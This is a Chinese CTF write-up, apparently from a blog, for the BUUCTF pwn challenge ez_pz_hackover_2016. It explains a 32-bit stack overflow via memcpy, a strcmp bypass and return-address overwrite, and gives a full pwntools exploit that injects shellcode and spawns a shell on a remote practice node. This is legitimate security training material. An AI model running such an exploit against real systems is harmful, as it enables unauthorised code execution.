ez_pz_hackover_2016

题目附件

解题步骤:
例行检查,32位,开启了RELRO保护,二进制的保护机制看这里
由于没有开启nx保护,对于这题一开始想到的是利用写入shellcode来获取shell

试运行一下程序,看到程序一开始给我们了一个地址,随后让我们输入

32位ida载入,首先习惯性的shift+f12检索程序里的字符串,没有看到敏感的函数
从main函数开始看程序

程序主体在chall函数里

一开始给我们输出了参数s的地址,之后利用fgets函数读入1023(0x3ff)长度的数据给s,s的大小是0x40c,没法造成溢出,之后将我们输入的数据利用strcmp函数跟crashme比较,如果不是这个字符串,就退出,

strcmp函数在百度百科里的解释:
两个字符串自左向右逐个字符相比(按ASCII值大小相比较),直到出现不同的字符或遇’\0’为止

也就是我们应该输入 ‘crashme\x00’ 可以绕过这个if检查,之后执行vuln函数

百度百科里对memcpy函数的解释
memcpy指的是C和C++使用的内存拷贝函数,函数原型为void *memcpy(void *destin, void *source, unsigned n);函数的功能是从源内存地址的起始位置开始拷贝若干个字节到目标内存地址中,即从源source中拷贝n个字节到目标destin中。
这里将我们的参数s中拷贝0x400个字节到dest中,dest的大小只有0x32,存在溢出漏洞

利用思路:
往s参数里写入shellcode,执行vuln函数后让dest造成溢出,将返回地址修改为shellcode的地址去执行

利用过程:

  1. 首先我们利用pwndbg动态调试,来找一下我们写入shellcode在栈上的地址位置

在ida里找一个nop指令来下断点,我这边是利用0x8048600这个地址的nop

from pwn import *

p=process('./ez_pz_hackover_2016')

context.log_level='debug'

gdb.attach(p,'b *0x8048600')#利用gdb动调,在0x8048600处下了个断点

p.recvuntil('crash: ')

stack=int(p.recv(10),16)#接收回显的参数s在栈上的地址,长度是10,以16进制表示

print hex(stack)

payload='crashme\x00'+'aaaaaa'#前面的crashme\x00绕过if判断

      #后面的aaaa是测试数据,随便输入的,我们等等去栈上找它的地址

      #利用它找到返回地址在栈上的地址,将返回地址覆盖为shellcode

p.sendline(payload)

pause()#linxu下的暂停程序命令

将上述代码执行后会多跳出来一个图2,图1注意一下得到的s在栈上的地址


按c继续执行下一步,看到它在我们下的断点处断开了

输入命令 stack 50 来查看一下栈布局,看到了我们输入的数据,‘ashme’,由于对齐的原因,没有跟 ‘cr’ 连在一起,我们看它上一行0x63就是 ‘c’ ,0x72是 ‘r’ ,由于小端序的原因,所以是这样的

看到ebp的位置是0x38,我们输入参数的位置是0x22(我们看左边是0x20,但其实是0x22,看0x20上的参数 0x72 63 00 00对应的0x23,0x22,0x21,0x20 我们实际上是在0x22处开始写如我们数据的)

那么我们的ebp距离我们的输入点的距离是0x38-0x22=0x16;我们的shellcode应该写在ebp之后(32位程序的ebp占4个字节),就是在0x16+0x4处,换句话说我们在覆盖完ebp后的返回地址应该填写指向shellcode的地址

payload='crashme\x00'+'a'*(0x16-8+4)+p32(addr)

-8是 ‘crashme\x00’ 占用了8字节,+4是用来覆盖ebp的

  1. 接下来解决我们的指向shellcode的地址的问题
    我们一开始得到了一个栈上的地址0xffced7cc,它在参数s栈上的相对位置是0x20,我们的返回地址在参数s栈上的相对位置是0x3c(ebp+4),我们输入点距离我们的返回地址的距离是0x3c-0x20=0x1c ,所以我们可以用oxffced7cc-0x1c来表示返回地址

因此我们可以构造payload

payload='crashme\x00'+'a'*(0x16-8+4)+p32(stack-0x1c)+p32(shellcode)

这样就完成了利用

完整EXP:

from pwn import *

r=remote('node3.buuoj.cn',26843)

#p=process('./ez_pz_hackover_2016')

context.log_level='debug'

#gdb.attach(p,'b *0x8048600')

r.recvuntil('crash: ')

stack=int(r.recv(10),16)

shellcode=asm(shellcraft.sh())#利用pwntools自动生成shellcode

#print hex(stack)

payload='crashme\x00'+'a'*(0x16-8+4)+p32(stack-0x1c)+shellcode

r.sendline(payload)

#pause()

r.interactive()

[BUUCTF]PWN——ez_pz_hackover_2016的更多相关文章

  1. [BUUCTF]PWN——babyheap_0ctf_2017

    [BUUCTF]PWN--babyheap_0ctf_2017 附件 步骤: 例行检查,64位,保护全开 试运行一下程序,看到这个布局菜单,知道了这是一道堆的题目,第一次接触堆的小伙伴可以去看一下这个 ...

  2. (buuctf) - pwn入门部分wp - rip -- pwn1_sctf_2016

    [buuctf]pwn入门 pwn学习之路引入 栈溢出引入 test_your_nc [题目链接] 注意到 Ubuntu 18, Linux系统 . nc 靶场 nc node3.buuoj.cn 2 ...

  3. [BUUCTF]PWN——hitcontraining_uaf

    [BUUCTF]--hitcontraining_uaf 附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,非常常见的创建堆块的菜单 32位ida载入分析,shift+f12查看程序里的 ...

  4. BUUCTF PWN部分题目wp

    pwn好难啊 PWN 1,连上就有flag的pwnnc buuoj.cn 6000得到flag 2,RIP覆盖一下用ida分析一下,发现已有了system,只需覆盖RIP为fun()的地址,用peda ...

  5. buuctf --pwn part2

    pwn难啊! 1.[OGeek2019]babyrop 先check一下文件,开启了NX 在ida中没有找到system.'/bin/sh'等相关的字符,或许需要ROP绕过(废话,题目提示了) 查看到 ...

  6. buuctf pwn wp---part1

    pwn难啊 1.test_your_nc 测试你nc,不用说,连上就有. 2.rip ida中已经包含了system函数: 溢出,覆盖rip为fun函数,peda计算偏移为23: from pwn i ...

  7. [BUUCTF]PWN——pwnable_hacknote

    pwnable_hacknote 附件 步骤: 例行检查,32位程序,开启了nx和canary保护 本地试运行看一下大概的情况,熟悉的堆的菜单 32位ida载入 add() gdb看一下堆块的布局更方 ...

  8. [BUUCTF]PWN——ciscn_2019_es_7[详解]

    ciscn_2019_es_7 附件 步骤: 例行检查,64位程序,开启了nx保护 本地试运行一下看看大概的情况 64位ida载入,关键函数很简单,两个系统调用,buf存在溢出 看到系统调用和溢出,想 ...

  9. [BUUCTF]PWN——mrctf2020_easyoverflow

    mrctf2020_easyoverflow 附件 步骤: 例行检查,64位程序,保护全开 本地试运行的时候就直接一个输入,然后就没了,直接用64位ida打开 只要满足18行的条件,就能够获取shel ...

随机推荐

  1. [bzoj1280]卖猪

    首先考虑猪无法流动,那么源点向每一个猪圈连猪圈中猪个数的边,每一个顾客向汇点连所需猪的边,每一个猪圈向能打开它的顾客连inf的边,跑最大流即可. 但考虑猪要流动,有一个十分巧妙地做法,将每一个顾客所有 ...

  2. [loj519]数学上来先打表

    建立操作树,即1和3操作时i-1向i连边,2操作中k向i连边,然后dfs一遍 那么当我们走到一个节点,就执行该操作(修改也是操作),退出后取消该操作即可 于是相当于要维护一个东西,支持:1.加边:2. ...

  3. go程序不停机重启

    让我们给http服务写一个版本更新接口,让它自动更新版本并重启服务吧. 初步例子 注:为了精简,文中代码都去除了err处理 main.go var Version = "1.0" ...

  4. 微信小程序如何重写Page方法?以及重写Page方法给开发者带来的好处

    17,18年的时候,我当时主要开发小程序,那时候领导想看一下小程序的访问量,还有一些埋点的需求,于是我们的小程序就接入了阿拉丁统计. 阿拉丁的接入方式除了配置以外,主要就一行引入代码.官方要求将以下代 ...

  5. k8s statefulset controller源码分析

    statefulset controller分析 statefulset简介 statefulset是Kubernetes提供的管理有状态应用的对象,而deployment用于管理无状态应用. 有状态 ...

  6. 阿里性能专家全方位对比Jmeter和Locust,到底谁更香?

    近些年,随着互联网行业的不断发展,用户规模也有了爆发性的增长.产品的性能成为影响用户体验的重要因素.因此,性能测试越来越受到大型互联网企业的重视. 在做性能测试时,通常都会借助一些压测工具来模拟大量的 ...

  7. 【NOI导刊200908模拟试题02 题4】【二分+Dijkstra】 收费站

    Description 在某个遥远的国家里,有n个城市.编号外1,2,3,-,n. 这个国家的政府修建了m条双向的通路.每条公路连接着两个城市.沿着某条公路,开车从一个城市到另一个城市,需要花费一定的 ...

  8. 【豆科基因组】普通豆/菜豆/四季豆Common bean (Phaseolus vulgaris L.) 基因组

    目录 研究一:G19833组装,2014NG 研究二:BAT 93组装,2016 genome biology 菜豆属(Phaseolus L.)为同源二倍体作物,包含有80 多个物种,多数为野生种, ...

  9. 全基因组选择育种(GS)简介

    全基因组选择(Genomic selection, GS)是一种利用覆盖全基因组的高密度标记进行选择育种的新方法,可通过早期选择缩短世代间隔,提高育种值(Genomic Estimated Breed ...

  10. quota

    一.什么是磁盘配额 磁盘配额从字面意思上看就是给一个磁盘配置多少额度,而quota就是有多少限额的意思,所以总的来说就是限制用户对磁盘空间的使用量.因为Linux是多用户多任务的操作系统,许多人公用磁 ...